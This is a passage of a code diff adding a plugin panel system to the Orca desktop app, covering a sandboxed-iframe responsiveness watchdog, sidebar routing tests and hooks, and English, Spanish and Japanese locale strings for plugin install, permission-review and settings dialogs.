+    const onUnresponsive = vi.fn()
+    const watchdog = createPanelWatchdog({
+      sendPing,
+      onUnresponsive,
+      pingIntervalMs: 100,
+      pongTimeoutMs: 50
+    })
+
+    watchdog.start()
+    vi.advanceTimersByTime(50)
+    vi.advanceTimersByTime(1_000)
+
+    expect(onUnresponsive).toHaveBeenCalledTimes(1)
+    expect(sendPing).toHaveBeenCalledTimes(1)
+  })
+})

--- a/src/renderer/src/components/right-sidebar/plugin-panel-watchdog.ts
+++ b/src/renderer/src/components/right-sidebar/plugin-panel-watchdog.ts
@@ -1,0 +1,97 @@
+import {
+  PANEL_WATCHDOG_PING_INTERVAL_MS,
+  PANEL_WATCHDOG_PONG_TIMEOUT_MS
+} from '../../../../shared/plugins/plugin-panel-bridge'
+
+/**
+ * Panel responsiveness watchdog: pings the sandboxed frame on an interval
+ * and demotes the panel to an errored badge when a pong misses its deadline.
+ * The busy-loop guarantee depends on Chromium assigning the sandboxed frame
+ * a separate renderer, which the Electron containment test gates explicitly.
+ * Pure timer logic keeps deadline behavior deterministic in unit tests.
+ */
+
+export type PanelWatchdogOptions = {
+  sendPing: (pingId: number) => void
+  onUnresponsive: () => void
+  pingIntervalMs?: number
+  pongTimeoutMs?: number
+}
+
+export type PanelWatchdog = {
+  start(): void
+  stop(): void
+  handlePong(pingId: number): void
+}
+
+export function createPanelWatchdog(options: PanelWatchdogOptions): PanelWatchdog {
+  const pingIntervalMs = options.pingIntervalMs ?? PANEL_WATCHDOG_PING_INTERVAL_MS
+  const pongTimeoutMs = options.pongTimeoutMs ?? PANEL_WATCHDOG_PONG_TIMEOUT_MS
+  let pingTimer: ReturnType<typeof setInterval> | null = null
+  let deadlineTimer: ReturnType<typeof setTimeout> | null = null
+  let nextPingId = 0
+  let awaitedPingId: number | null = null
+  let active = false
+  let generation = 0
+
+  const clearDeadline = (): void => {
+    if (deadlineTimer) {
+      clearTimeout(deadlineTimer)
+      deadlineTimer = null
+    }
+  }
+
+  const ping = (): void => {
+    if (!active || awaitedPingId !== null) {
+      // A ping is already outstanding; its deadline will fire first.
+      return
+    }
+    awaitedPingId = nextPingId++
+    options.sendPing(awaitedPingId)
+    const deadlineGeneration = generation
+    deadlineTimer = setTimeout(() => {
+      if (active && generation === deadlineGeneration && awaitedPingId !== null) {
+        active = false
+        if (pingTimer) {
+          clearInterval(pingTimer)
+          pingTimer = null
+        }
+        deadlineTimer = null
+        awaitedPingId = null
+        options.onUnresponsive()
+      }
+    }, pongTimeoutMs)
+  }
+
+  return {
+    start() {
+      if (active) {
+        return
+      }
+      // React StrictMode intentionally runs effect setup → cleanup → setup.
+      // A stopped watchdog must be reusable by the second real setup.
+      generation += 1
+      active = true
+      awaitedPingId = null
+      clearDeadline()
+      pingTimer = setInterval(ping, pingIntervalMs)
+      ping()
+    },
+    stop() {
+      active = false
+      generation += 1
+      if (pingTimer) {
+        clearInterval(pingTimer)
+        pingTimer = null
+      }
+      clearDeadline()
+      awaitedPingId = null
+    },
+    handlePong(pingId) {
+      if (active && pingId === awaitedPingId) {
+        awaitedPingId = null
+        clearDeadline()
+      }
+    }
+  }
+}

--- a/src/renderer/src/components/right-sidebar/right-sidebar-activity-visibility.test.ts
+++ b/src/renderer/src/components/right-sidebar/right-sidebar-activity-visibility.test.ts
@@ -26,7 +26,14 @@ const items: ActivityBarItem[] = [
     shortcut: '',
     gitOnly: true
   },
-  { id: 'ports', icon: Files, title: 'Ports', shortcut: '', sshOnly: true }
+  { id: 'ports', icon: Files, title: 'Ports', shortcut: '', sshOnly: true },
+  // Plugin panels carry no visibility flags, so they show in every context.
+  {
+    id: 'plugin:orca-samples.my-plugin/dashboard',
+    icon: Files,
+    title: 'Dashboard',
+    shortcut: ''
+  }
 ]
 
 describe('getVisibleRightSidebarActivityItems', () => {
@@ -37,7 +44,7 @@ describe('getVisibleRightSidebarActivityItems', () => {
         isFolderWorkspace: false,
         isSshRepo: false
       }).map((item) => item.id)
-    ).toEqual(['explorer', 'source-control'])
+    ).toEqual(['explorer', 'source-control', 'plugin:orca-samples.my-plugin/dashboard'])
 
     expect(
       getVisibleRightSidebarActivityItems(items, {
@@ -45,7 +52,7 @@ describe('getVisibleRightSidebarActivityItems', () => {
         isFolderWorkspace: false,
         isSshRepo: true
       }).map((item) => item.id)
-    ).toEqual(['explorer', 'source-control', 'ports'])
+    ).toEqual(['explorer', 'source-control', 'ports', 'plugin:orca-samples.my-plugin/dashboard'])
   })
 
   it('shows Workspaces only for folder workspaces and hides git tabs for all folder scopes', () => {
@@ -55,7 +62,13 @@ describe('getVisibleRightSidebarActivityItems', () => {
         isFolderWorkspace: true,
         isSshRepo: true
       }).map((item) => item.id)
-    ).toEqual(['explorer', 'workspaces', 'pr-checks', 'ports'])
+    ).toEqual([
+      'explorer',
+      'workspaces',
+      'pr-checks',
+      'ports',
+      'plugin:orca-samples.my-plugin/dashboard'
+    ])
 
     expect(
       getVisibleRightSidebarActivityItems(items, {
@@ -63,6 +76,6 @@ describe('getVisibleRightSidebarActivityItems', () => {
         isFolderWorkspace: false,
         isSshRepo: true
       }).map((item) => item.id)
-    ).toEqual(['explorer', 'ports'])
+    ).toEqual(['explorer', 'ports', 'plugin:orca-samples.my-plugin/dashboard'])
   })
 })

--- a/src/renderer/src/components/right-sidebar/right-sidebar-effective-tab.test.ts
+++ b/src/renderer/src/components/right-sidebar/right-sidebar-effective-tab.test.ts
@@ -72,6 +72,28 @@ describe('resolveRightSidebarEffectiveTab', () => {
     ).toBe('explorer')
   })
 
+  it('keeps a plugin tab active while its panel is still contributed', () => {
+    expect(
+      resolveRightSidebarEffectiveTab({
+        normalizedActiveTab: 'plugin:orca-samples.my-plugin/dashboard',
+        visibleItems: [...gitVisibleItems, { id: 'plugin:orca-samples.my-plugin/dashboard' }],
+        activeFolderWorkspaceKey: null,
+        rememberedFolderTab: null
+      })
+    ).toBe('plugin:orca-samples.my-plugin/dashboard')
+  })
+
+  it('falls back to the first visible item when a plugin tab was uninstalled', () => {
+    expect(
+      resolveRightSidebarEffectiveTab({
+        normalizedActiveTab: 'plugin:orca-samples.my-plugin/dashboard',
+        visibleItems: gitVisibleItems,
+        activeFolderWorkspaceKey: null,
+        rememberedFolderTab: null
+      })
+    ).toBe('explorer')
+  })
+
   it('treats empty visible items as an invariant failure', () => {
     expect(() =>
       resolveRightSidebarEffectiveTab({

--- a/src/renderer/src/components/right-sidebar/right-sidebar-panel-content.tsx
+++ b/src/renderer/src/components/right-sidebar/right-sidebar-panel-content.tsx
@@ -1,6 +1,7 @@
 import { Suspense } from 'react'
 import { lazyWithRetry as lazy } from '@/lib/lazy-with-retry'
 import type { ActiveRightSidebarTab } from '@/store/slices/editor'
+import { isPluginPanelTabKey } from '../../../../shared/plugins/plugin-manifest'
 
 const FileExplorer = lazy(() => import('./FileExplorer'))
 const SourceControl = lazy(() => import('./SourceControl'))
@@ -9,6 +10,7 @@ const PortsPanel = lazy(() => import('./PortsPanel'))
 const AiVaultPanel = lazy(() => import('./AiVaultPanel'))
 const FolderWorkspaceWorktreesPanel = lazy(() => import('./FolderWorkspaceWorktreesPanel'))
 const FolderWorkspacePrChecksPanel = lazy(() => import('./FolderWorkspacePrChecksPanel'))
+const PluginPanel = lazy(() => import('./PluginPanel'))
 
 type RightSidebarPanelContentProps = {
   effectiveTab: ActiveRightSidebarTab
@@ -37,6 +39,14 @@ export function RightSidebarPanelContent({
           <FolderWorkspacePrChecksPanel
             isVisible={rightSidebarOpen && effectiveTab === 'pr-checks'}
           />
+        )}
+        {/* Plugin-contributed tabs route by key prefix; the panel itself
+            handles plugins that have since been uninstalled or disabled.
+            Why key: switching plugin tabs must remount the sandboxed iframe —
+            a reused frame could keep posting messages while the bridge is
+            rebound under the next plugin's identity. */}
+        {isPluginPanelTabKey(effectiveTab) && (
+          <PluginPanel key={effectiveTab} tabKey={effectiveTab} />
         )}
       </Suspense>
     </div>

--- a/src/renderer/src/components/right-sidebar/use-installed-plugin-route-reconciliation.test.tsx
+++ b/src/renderer/src/components/right-sidebar/use-installed-plugin-route-reconciliation.test.tsx
@@ -1,0 +1,91 @@
+// @vitest-environment happy-dom
+
+import { createRoot } from 'react-dom/client'
+import { act } from 'react'
+import { afterEach, describe, expect, it, vi } from 'vitest'
+import type { PluginPanelsFetchStatus } from '@/store/plugin-panels'
+import type { ActiveRightSidebarTab } from '@/store/slices/editor'
+import { useInstalledPluginRouteReconciliation } from './use-installed-plugin-route-reconciliation'
+
+const roots: ReturnType<typeof createRoot>[] = []
+
+afterEach(async () => {
+  await act(async () => {
+    for (const root of roots.splice(0)) {
+      root.unmount()
+    }
+  })
+  document.body.innerHTML = ''
+})
+
+describe('useInstalledPluginRouteReconciliation', () => {
+  it('waits through loading, then persists Explorer for a proven-uninstalled panel', async () => {
+    const container = document.createElement('div')
+    document.body.appendChild(container)
+    const root = createRoot(container)
+    roots.push(root)
+    const setStoredTab = vi.fn()
+    const storedTab = 'plugin:orca-samples.removed/dashboard' as const
+    const Harness = ({ fetchStatus }: { fetchStatus: PluginPanelsFetchStatus }) => {
+      useInstalledPluginRouteReconciliation({
+        pluginSystemEnabled: true,
+        fetchStatus,
+        storedTab,
+        normalizedTab: 'explorer',
+        setStoredTab
+      })
+      return null
+    }
+
+    await act(async () => root.render(<Harness fetchStatus="loading" />))
+    expect(setStoredTab).not.toHaveBeenCalled()
+
+    await act(async () => root.render(<Harness fetchStatus="ready" />))
+    expect(setStoredTab).toHaveBeenCalledOnce()
+    expect(setStoredTab).toHaveBeenCalledWith('explorer' satisfies ActiveRightSidebarTab)
+  })
+
+  it('does not rewrite a still-installed plugin route', async () => {
+    const container = document.createElement('div')
+    document.body.appendChild(container)
+    const root = createRoot(container)
+    roots.push(root)
+    const setStoredTab = vi.fn()
+    const storedTab = 'plugin:orca-samples.present/dashboard' as const
+    const Harness = () => {
+      useInstalledPluginRouteReconciliation({
+        pluginSystemEnabled: true,
+        fetchStatus: 'ready',
+        storedTab,
+        normalizedTab: storedTab,
+        setStoredTab
+      })
+      return null
+    }
+
+    await act(async () => root.render(<Harness />))
+    expect(setStoredTab).not.toHaveBeenCalled()
+  })
+
+  it('preserves an installed route while the global plugin feature is disabled', async () => {
+    const container = document.createElement('div')
+    document.body.appendChild(container)
+    const root = createRoot(container)
+    roots.push(root)
+    const setStoredTab = vi.fn()
+    const storedTab = 'plugin:orca-samples.present/dashboard' as const
+    const Harness = () => {
+      useInstalledPluginRouteReconciliation({
+        pluginSystemEnabled: false,
+        fetchStatus: 'ready',
+        storedTab,
+        normalizedTab: 'explorer',
+        setStoredTab
+      })
+      return null
+    }
+
+    await act(async () => root.render(<Harness />))
+    expect(setStoredTab).not.toHaveBeenCalled()
+  })
+})

--- a/src/renderer/src/components/right-sidebar/use-installed-plugin-route-reconciliation.ts
+++ b/src/renderer/src/components/right-sidebar/use-installed-plugin-route-reconciliation.ts
@@ -1,0 +1,25 @@
+import { useEffect } from 'react'
+import { isPluginPanelTabKey } from '../../../../shared/plugins/plugin-manifest'
+import type { PluginPanelsFetchStatus } from '@/store/plugin-panels'
+import type { ActiveRightSidebarTab } from '@/store/slices/editor'
+
+/** Persists removal only after the authoritative installed list is ready. */
+export function useInstalledPluginRouteReconciliation(input: {
+  pluginSystemEnabled: boolean
+  fetchStatus: PluginPanelsFetchStatus
+  storedTab: ActiveRightSidebarTab
+  normalizedTab: ActiveRightSidebarTab
+  setStoredTab: (tab: ActiveRightSidebarTab) => void
+}): void {
+  const { pluginSystemEnabled, fetchStatus, storedTab, normalizedTab, setStoredTab } = input
+  useEffect(() => {
+    if (
+      pluginSystemEnabled &&
+      fetchStatus === 'ready' &&
+      isPluginPanelTabKey(storedTab) &&
+      normalizedTab !== storedTab
+    ) {
+      setStoredTab(normalizedTab)
+    }
+  }, [fetchStatus, normalizedTab, pluginSystemEnabled, setStoredTab, storedTab])
+}

--- a/src/renderer/src/components/right-sidebar/use-plugin-panel-theme-revision.ts
+++ b/src/renderer/src/components/right-sidebar/use-plugin-panel-theme-revision.ts
@@ -1,0 +1,15 @@
+import { useEffect, useState } from 'react'
+
+/** Changes whenever root theme classes/tokens may have changed. */
+export function usePluginPanelThemeRevision(): number {
+  const [revision, setRevision] = useState(0)
+  useEffect(() => {
+    const observer = new MutationObserver(() => setRevision((current) => current + 1))
+    observer.observe(document.documentElement, {
+      attributes: true,
+      attributeFilter: ['class', 'style']
+    })
+    return () => observer.disconnect()
+  }, [])
+  return revision
+}

--- a/src/renderer/src/i18n/locales/en.json
+++ b/src/renderer/src/i18n/locales/en.json
@@ -698,7 +698,9 @@
         "devSearchKeywordToast": "toast",
         "devSearchKeywordSonner": "sonner",
         "devSearchKeywordError": "error",
-        "devSearchKeywordNotification": "notification"
+        "devSearchKeywordNotification": "notification",
+        "pluginsTitle": "Plugins",
+        "pluginsDescription": "Install and manage experimental Orca plugins."
       },
       "useAppMenuPaste": {
         "pasteTooLarge": "Paste is too large."
@@ -9032,6 +9034,118 @@
         "TerminalInteractionSection": {
           "567633ff50": "Right-click pastes the clipboard into the terminal. Control-click to open the context menu.",
           "c64497148a": "Right-click pastes the clipboard. Control-click opens the context menu."
+        },
+        "PluginConsentDialog": {
+          "workerTrust": "Background worker — runs its own process",
+          "panelTrust": "Panel only — no worker process",
+          "decisionFailed": "Could not save the permission decision.",
+          "title": "Review permissions",
+          "subtitle": "{{value0}} v{{value1}} · {{value2}}",
+          "reconsent": "Permissions or the worker trust tier changed since you last reviewed this plugin. Review them again before it can run.",
+          "source": "Source",
+          "unknownSource": "Not available",
+          "commit": "Commit",
+          "localCommit": "Not available (local folder)",
+          "trust": "Trust tier",
+          "capabilities": "This plugin can",
+          "warning": "These permissions limit how the plugin uses Orca's API. Its worker still runs as a normal process on your computer with full access to your files, network, and other processes.",
+          "enable": "Enable plugin",
+          "keepDisabled": "Keep Disabled",
+          "panelWarning": "These permissions limit how the plugin uses Orca's API. This plugin has no worker process.",
+          "capability": {
+            "workspaceRead": "Read the name, branch, and terminal list of your focused worktree",
+            "terminalSend": "Type text into a terminal you can see (always a specific terminal)",
+            "notificationsShow": "Show desktop notifications labeled with the plugin name",
+            "storage": "Store data in the plugin's own storage folder",
+            "secrets": "Store and read secrets in the plugin's own encrypted vault",
+            "eventsSubscribe": "Get notified when worktrees are created or removed and when agent status changes",
+            "settingsOwn": "Read and change the plugin's own settings"
+          }
+        },
+        "PluginDevelopmentSection": {
+          "pathRequired": "Enter a plugin folder path.",
+          "title": "Development",
+          "help": "Load plugins directly from folders on this computer while you develop them. Dev plugins still require permission review. Workers run on this desktop host; SSH workspace actions route through Orca, so paths here are desktop paths.",
+          "remove": "Remove",
+          "placeholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "add": "Add path",
+          "saveFailed": "Could not save development plugin paths."
+        },
+        "PluginInstallDialog": {
+          "localRequired": "Enter the plugin folder path.",
+          "gitUrlRequired": "Enter a repository URL.",
+          "gitRefRequired": "Add an explicit #ref (tag or commit) so the install is pinned — for example #v0.1.0.",
+          "installFailed": "Plugin installation failed.",
+          "title": "Install plugin",
+          "description": "Installing copies the plugin into Orca and shows its permissions for review. No plugin code runs until you enable it.",
+          "source": "Install source",
+          "localTab": "Local folder",
+          "gitTab": "Git URL",
+          "localLabel": "Plugin folder path",
+          "localPlaceholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "localHelp": "Full path to a folder containing orca-plugin.json on this computer. The path is used exactly as entered.",
+          "gitLabel": "Repository URL with #ref",
+          "gitPlaceholder": "https://git.example/acme/orca-notes#v0.1.0",
+          "gitHelp": "Append an explicit #ref — a tag or commit — so the install is pinned. Works with GitHub, GitLab, and any git host.",
+          "cancel": "Cancel",
+          "installing": "Installing…",
+          "install": "Install",
+          "gitUrlInvalid": "Use an HTTPS or SSH Git URL. Executable Git helper protocols are not allowed."
+        },
+        "PluginRemoveDialog": {
+          "title": "Remove plugin?",
+          "description": "This removes {{value0}} and its stored plugin data from this computer. You can install it again later.",
+          "cancel": "Cancel",
+          "remove": "Remove plugin"
+        },
+        "PluginSettingsRow": {
+          "needsReview": "Needs review",
+          "invalid": "Invalid",
+          "error": "Error",
+          "disabled": "Disabled",
+          "running": "Running",
+          "enabled": "Enabled",
+          "workerTier": "background worker",
+          "panelTier": "panel only",
+          "loadingLogs": "Loading logs…",
+          "noLogs": "No log lines recorded.",
+          "logCount": "Last {{value0}} of up to 200 retained lines",
+          "dev": "Dev",
+          "review": "Review permissions",
+          "moreActions": "More actions for {{value0}}",
+          "hideLogs": "Hide logs",
+          "viewLogs": "View logs",
+          "remove": "Remove",
+          "enableLabel": "Enable {{value0}}",
+          "restartCount": " · {{value0}} restarts",
+          "restarting": "Restarting"
+        },
+        "PluginsSettingsSection": {
+          "loadFailed": "Could not load plugins.",
+          "logsFailed": "Could not load plugin logs.",
+          "title": "Plugins",
+          "experimental": "Experimental",
+          "description": "Install and manage Orca plugins. Plugins run on this computer, even for SSH workspaces.",
+          "install": "Install plugin",
+          "systemLabel": "Plugin system",
+          "systemDescription": "Discovers installed plugins and lets you enable them individually. Nothing runs until you review and enable it. Workers always run on this computer; SSH workspace actions route through Orca.",
+          "featureOff": "Turn on the plugin system to see and manage installed plugins. Anything already installed stays on disk and stays disabled while the system is off.",
+          "loading": "Loading plugins…",
+          "installed": "Installed",
+          "refresh": "Refresh",
+          "tryAgain": "Try again",
+          "empty": "No plugins installed. Use Install plugin to add one from a local folder or a pinned git ref.",
+          "settingsUpdateFailed": "Could not save plugin settings."
+        },
+        "plugins": {
+          "search": {
+            "title": "Plugins",
+            "description": "Install and manage experimental Orca plugins.",
+            "install": "install plugin",
+            "permissions": "plugin permissions",
+            "logs": "plugin logs",
+            "development": "development plugins"
+          }
         }
       },
       "right": {
@@ -9735,6 +9849,12 @@
             "aiVaultSessionHistory": "Agents",
             "folderWorkspaces": "Attached worktrees",
             "parentPrChecks": "PR Checks"
+          },
+          "PluginPanel": {
+            "loading": "Loading plugin panel...",
+            "unavailable": "This plugin panel is no longer available.",
+            "loadFailed": "The plugin panel could not be loaded.",
+            "unresponsive": "This plugin panel stopped responding and was suspended."
           },
           "right": {
             "panel": {
@@ -12687,6 +12807,11 @@
             "noPr": "No PR",
             "unavailable": "Unavailable"
           }
+        },
+        "pluginPanelBridgeHost": {
+          "actionsUnavailable": "Plugin actions are not available in this client.",
+          "messageTooLarge": "Message exceeds the size limit.",
+          "tooManyRequests": "Too many requests."
         }
       },
       "link": {

--- a/src/renderer/src/i18n/locales/es.json
+++ b/src/renderer/src/i18n/locales/es.json
@@ -698,7 +698,9 @@
         "devSearchKeywordToast": "toast",
         "devSearchKeywordSonner": "sonner",
         "devSearchKeywordError": "error",
-        "devSearchKeywordNotification": "notification"
+        "devSearchKeywordNotification": "notification",
+        "pluginsTitle": "Plugins",
+        "pluginsDescription": "Instala y administra plugins experimentales de Orca."
       },
       "useAppMenuPaste": {
         "pasteTooLarge": "El contenido pegado es demasiado grande."
@@ -9032,6 +9034,118 @@
         "TerminalInteractionSection": {
           "567633ff50": "Right-click pastes the clipboard into the terminal. Control-click to open the context menu.",
           "c64497148a": "Right-click pastes the clipboard. Control-click opens the context menu."
+        },
+        "PluginConsentDialog": {
+          "workerTrust": "Proceso en segundo plano — se ejecuta en su propio proceso",
+          "panelTrust": "Solo panel — sin proceso en segundo plano",
+          "decisionFailed": "No se pudo guardar la decisión sobre los permisos.",
+          "title": "Revisar permisos",
+          "subtitle": "{{value0}} v{{value1}} · {{value2}}",
+          "reconsent": "Los permisos o el nivel de confianza del proceso cambiaron desde la última revisión de este plugin. Revísalos de nuevo antes de ejecutarlo.",
+          "source": "Origen",
+          "unknownSource": "No disponible",
+          "commit": "Commit",
+          "localCommit": "No disponible (carpeta local)",
+          "trust": "Nivel de confianza",
+          "capabilities": "Este plugin puede",
+          "warning": "Estos permisos limitan cómo usa el plugin la API de Orca. Su proceso se ejecuta como un proceso normal en tu equipo, con acceso completo a tus archivos, red y otros procesos.",
+          "enable": "Activar plugin",
+          "keepDisabled": "Mantener desactivado",
+          "panelWarning": "Estos permisos limitan cómo usa el plugin la API de Orca. Este plugin no tiene ningún proceso en segundo plano.",
+          "capability": {
+            "workspaceRead": "Leer el nombre, la rama y la lista de terminales del worktree seleccionado",
+            "terminalSend": "Escribir texto en una terminal visible (siempre en una terminal específica)",
+            "notificationsShow": "Mostrar notificaciones de escritorio con el nombre del plugin",
+            "storage": "Guardar datos en la carpeta de almacenamiento propia del plugin",
+            "secrets": "Guardar y leer secretos en la bóveda cifrada propia del plugin",
+            "eventsSubscribe": "Recibir avisos cuando se creen o eliminen worktrees y cuando cambie el estado de un agente",
+            "settingsOwn": "Leer y cambiar la configuración propia del plugin"
+          }
+        },
+        "PluginDevelopmentSection": {
+          "pathRequired": "Introduce la ruta de una carpeta de plugin.",
+          "title": "Desarrollo",
+          "help": "Carga plugins directamente desde carpetas de este equipo mientras los desarrollas. Los plugins de desarrollo también requieren revisar los permisos. Sus procesos se ejecutan en este equipo; las acciones de espacios de trabajo SSH se enrutan mediante Orca, por lo que estas rutas son rutas del equipo local.",
+          "remove": "Eliminar",
+          "placeholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "add": "Añadir ruta",
+          "saveFailed": "No se pudieron guardar las rutas de plugins de desarrollo."
+        },
+        "PluginInstallDialog": {
+          "localRequired": "Introduce la ruta de la carpeta del plugin.",
+          "gitUrlRequired": "Introduce una URL de repositorio.",
+          "gitRefRequired": "Añade una #ref explícita (etiqueta o commit) para fijar la instalación; por ejemplo, #v0.1.0.",
+          "installFailed": "No se pudo instalar el plugin.",
+          "title": "Instalar plugin",
+          "description": "La instalación copia el plugin en Orca y muestra sus permisos para que los revises. No se ejecuta ningún código del plugin hasta que lo actives.",
+          "source": "Origen de instalación",
+          "localTab": "Carpeta local",
+          "gitTab": "Git URL",
+          "localLabel": "Ruta de la carpeta del plugin",
+          "localPlaceholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "localHelp": "Ruta completa a una carpeta de este equipo que contenga orca-plugin.json. La ruta se usa exactamente como se introduce.",
+          "gitLabel": "URL del repositorio con #ref",
+          "gitPlaceholder": "https://git.example/acme/orca-notes#v0.1.0",
+          "gitHelp": "Añade una #ref explícita —una etiqueta o commit— para fijar la instalación. Funciona con GitHub, GitLab y cualquier servidor Git.",
+          "cancel": "Cancelar",
+          "installing": "Instalando…",
+          "install": "Instalar",
+          "gitUrlInvalid": "Usa una URL de Git HTTPS o SSH. No se permiten protocolos auxiliares ejecutables de Git."
+        },
+        "PluginRemoveDialog": {
+          "title": "¿Eliminar plugin?",
+          "description": "Esto elimina {{value0}} y los datos guardados del plugin en este equipo. Puedes volver a instalarlo más adelante.",
+          "cancel": "Cancelar",
+          "remove": "Eliminar plugin"
+        },
+        "PluginSettingsRow": {
+          "needsReview": "Requiere revisión",
+          "invalid": "No válido",
+          "error": "Error",
+          "disabled": "Desactivado",
+          "running": "En ejecución",
+          "enabled": "Activado",
+          "workerTier": "proceso en segundo plano",
+          "panelTier": "solo panel",
+          "loadingLogs": "Cargando registros…",
+          "noLogs": "No hay líneas de registro.",
+          "logCount": "Últimas {{value0}} de hasta 200 líneas conservadas",
+          "dev": "Desarrollo",
+          "review": "Revisar permisos",
+          "moreActions": "Más acciones para {{value0}}",
+          "hideLogs": "Ocultar registros",
+          "viewLogs": "Ver registros",
+          "remove": "Eliminar",
+          "enableLabel": "Activar {{value0}}",
+          "restartCount": " · {{value0}} reinicios",
+          "restarting": "Reiniciando"
+        },
+        "PluginsSettingsSection": {
+          "loadFailed": "No se pudieron cargar los plugins.",
+          "logsFailed": "No se pudieron cargar los registros del plugin.",
+          "title": "Plugins",
+          "experimental": "Experimental",
+          "description": "Instala y administra plugins de Orca. Los plugins se ejecutan en este equipo, incluso en espacios de trabajo SSH.",
+          "install": "Instalar plugin",
+          "systemLabel": "Sistema de plugins",
+          "systemDescription": "Descubre los plugins instalados y permite activarlos por separado. Nada se ejecuta hasta que lo revises y actives. Sus procesos siempre se ejecutan en este equipo; las acciones de espacios de trabajo SSH se enrutan mediante Orca.",
+          "featureOff": "Activa el sistema de plugins para ver y administrar los plugins instalados. Todo lo que ya esté instalado permanece en el disco y desactivado mientras el sistema esté apagado.",
+          "loading": "Cargando plugins…",
+          "installed": "Instalados",
+          "refresh": "Actualizar",
+          "tryAgain": "Intentar de nuevo",
+          "empty": "No hay plugins instalados. Usa Instalar plugin para añadir uno desde una carpeta local o una referencia Git fijada.",
+          "settingsUpdateFailed": "No se pudo guardar la configuración de plugins."
+        },
+        "plugins": {
+          "search": {
+            "title": "Plugins",
+            "description": "Instala y administra plugins experimentales de Orca.",
+            "install": "instalar plugin",
+            "permissions": "permisos de plugins",
+            "logs": "registros de plugins",
+            "development": "plugins de desarrollo"
+          }
         }
       },
       "right": {
@@ -10139,6 +10253,12 @@
             "workspaceGone": "Couldn't open log — workspace is no longer available.",
             "notAuthorized": "Couldn't open log — path not authorized.",
             "alreadyEditable": "Log is already open for editing."
+          },
+          "PluginPanel": {
+            "loading": "Cargando el panel del plugin...",
+            "unavailable": "Este panel de plugin ya no está disponible.",
+            "loadFailed": "No se pudo cargar el panel del plugin.",
+            "unresponsive": "El panel del plugin dejó de responder y se suspendió."
           }
         }
       },
@@ -12687,6 +12807,11 @@
             "noPr": "Sin PR",
             "unavailable": "No disponible"
           }
+        },
+        "pluginPanelBridgeHost": {
+          "actionsUnavailable": "Las acciones de plugins no están disponibles en este cliente.",
+          "messageTooLarge": "El mensaje supera el límite de tamaño.",
+          "tooManyRequests": "Demasiadas solicitudes."
         }
       },
       "link": {

--- a/src/renderer/src/i18n/locales/ja.json
+++ b/src/renderer/src/i18n/locales/ja.json
@@ -698,7 +698,9 @@
         "devSearchKeywordToast": "toast",
         "devSearchKeywordSonner": "sonner",
         "devSearchKeywordError": "error",
-        "devSearchKeywordNotification": "notification"
+        "devSearchKeywordNotification": "notification",
+        "pluginsTitle": "プラグイン",
+        "pluginsDescription": "試験的な Orca プラグインをインストールして管理します。"
       },
       "useAppMenuPaste": {
         "pasteTooLarge": "貼り付け内容が大きすぎます。"
@@ -9032,6 +9034,118 @@
         "TerminalInteractionSection": {
           "567633ff50": "Right-click pastes the clipboard into the terminal. Control-click to open the context menu.",
           "c64497148a": "Right-click pastes the clipboard. Control-click opens the context menu."
+        },
+        "PluginConsentDialog": {
+          "workerTrust": "バックグラウンドワーカー — 独自のプロセスで実行",
+          "panelTrust": "パネルのみ — ワーカープロセスなし",
+          "decisionFailed": "権限の選択を保存できませんでした。",
+          "title": "権限を確認",
+          "subtitle": "{{value0}} v{{value1}} · {{value2}}",
+          "reconsent": "前回このプラグインを確認してから、権限またはワーカーの信頼レベルが変更されました。実行する前にもう一度確認してください。",
+          "source": "ソース",
+          "unknownSource": "利用不可",
+          "commit": "コミット",
+          "localCommit": "利用不可（ローカルフォルダー）",
+          "trust": "信頼レベル",
+          "capabilities": "このプラグインに許可する操作",
+          "warning": "これらの権限は、プラグインによる Orca API の使用を制限します。ただしワーカーはコンピューター上の通常のプロセスとして実行され、ファイル、ネットワーク、ほかのプロセスに完全にアクセスできます。",
+          "enable": "プラグインを有効化",
+          "keepDisabled": "無効のままにする",
+          "panelWarning": "これらの権限は、プラグインによる Orca API の使用を制限します。このプラグインにはワーカープロセスがありません。",
+          "capability": {
+            "workspaceRead": "選択中のワークツリーの名前、ブランチ、ターミナル一覧を読み取る",
+            "terminalSend": "表示中の特定のターミナルにテキストを入力する",
+            "notificationsShow": "プラグイン名を付けたデスクトップ通知を表示する",
+            "storage": "プラグイン専用の保存フォルダーにデータを保存する",
+            "secrets": "プラグイン専用の暗号化保管庫にシークレットを保存し、読み取る",
+            "eventsSubscribe": "ワークツリーの作成・削除やエージェント状態の変更時に通知を受け取る",
+            "settingsOwn": "プラグイン自身の設定を読み取り、変更する"
+          }
+        },
+        "PluginDevelopmentSection": {
+          "pathRequired": "プラグインフォルダーのパスを入力してください。",
+          "title": "開発",
+          "help": "開発中のプラグインを、このコンピューター上のフォルダーから直接読み込みます。開発用プラグインにも権限の確認が必要です。ワーカーはこのデスクトップホストで実行され、SSH ワークスペースの操作は Orca 経由で処理されるため、ここにはデスクトップ側のパスを指定します。",
+          "remove": "削除",
+          "placeholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "add": "パスを追加",
+          "saveFailed": "開発用プラグインのパスを保存できませんでした。"
+        },
+        "PluginInstallDialog": {
+          "localRequired": "プラグインフォルダーのパスを入力してください。",
+          "gitUrlRequired": "リポジトリ URL を入力してください。",
+          "gitRefRequired": "インストールを固定するため、明示的な #ref（タグまたはコミット）を追加してください。例: #v0.1.0。",
+          "installFailed": "プラグインのインストールに失敗しました。",
+          "title": "プラグインをインストール",
+          "description": "インストールするとプラグインが Orca にコピーされ、確認する権限が表示されます。有効にするまでプラグインのコードは実行されません。",
+          "source": "インストール元",
+          "localTab": "ローカルフォルダー",
+          "gitTab": "Git URL",
+          "localLabel": "プラグインフォルダーのパス",
+          "localPlaceholder": "/Users/you/plugins/my-plugin or C:\\Users\\you\\plugins\\my-plugin",
+          "localHelp": "このコンピューター上で orca-plugin.json を含むフォルダーへのフルパスです。入力したパスがそのまま使用されます。",
+          "gitLabel": "#ref 付きリポジトリ URL",
+          "gitPlaceholder": "https://git.example/acme/orca-notes#v0.1.0",
+          "gitHelp": "明示的な #ref（タグまたはコミット）を付けてインストールを固定します。GitHub、GitLab、その他の Git ホストに対応しています。",
+          "cancel": "キャンセル",
+          "installing": "インストール中…",
+          "install": "インストール",
